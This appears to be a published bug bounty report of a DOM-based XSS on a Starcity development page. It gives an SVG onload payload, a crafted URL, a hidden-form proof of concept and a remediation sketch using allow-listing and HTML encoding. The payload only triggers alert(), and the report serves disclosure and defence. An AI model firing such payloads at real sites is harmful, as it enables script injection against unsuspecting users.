DOM-Based XSS on Starcity.com

  • Reported to Starcity
  • Reported by Haqtify
  • Medium (5.2)
  • $400
  • Published 3 years ago

URL:

https://dev.starcity.com/communities/?region=san-francisco

Description:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

"><svg/onload=alert(1)>

Steps To Reproduce:

1. Go to this URL.

https://dev.starcity.com/communities/?region=san-francisco

2. Append the XSS payload to the URL.

3. The XSS executes.

Final URL:

https://dev.starcity.com/communities/?region=san-francisco"><svg/onload=alert(1)>

XSS CSRF POC:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://dev.starcity.com/communities/">
<input type="hidden" name="region" value="san&#45;francisco&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;1&#41;&gt;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
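Remediation belongs on the output side. As an added example (not code from Starcity or from the report), the sketch below contrasts concatenating the `region` parameter into markup with an allow-list check followed by HTML encoding. The function names, the markup and the region list are assumptions, since the page does not show the site's source.

```javascript
// Added example: every name here (KNOWN_REGIONS, renderUnsafe, renderSafe) is
// hypothetical and not taken from the Starcity code base.

// Allow-list of region slugs the page is willing to render (constructed values).
const KNOWN_REGIONS = new Set(["san-francisco", "oakland"]);

// Encode the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Read the query parameter the report targets.
function readRegion(url) {
  return new URL(url).searchParams.get("region") || "";
}

// Vulnerable pattern: the raw parameter is concatenated into markup that a
// browser script would then hand to an HTML sink such as innerHTML.
function renderUnsafe(url) {
  const region = readRegion(url);
  return '<a class="region" href="/communities/?region=' + region + '">' + region + "</a>";
}

// Hardened pattern: reject anything outside the allow-list, and encode every
// value for its output context (URL component in href, HTML in text).
function renderSafe(url) {
  const raw = readRegion(url);
  if (!KNOWN_REGIONS.has(raw)) {
    return '<p class="error">Unknown region: ' + escapeHtml(raw) + "</p>";
  }
  return '<a class="region" href="/communities/?region=' + encodeURIComponent(raw) +
    '">' + escapeHtml(raw) + "</a>";
}

// The final URL from the report, used as test input.
const REPORTED_URL =
  'https://dev.starcity.com/communities/?region=san-francisco"><svg/onload=alert(1)>';

console.log("unsafe:", renderUnsafe(REPORTED_URL));
console.log("safe:  ", renderSafe(REPORTED_URL));
```

In a browser, assigning the value through `textContent` or `setAttribute` instead of building an HTML string removes the need for manual encoding.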

 
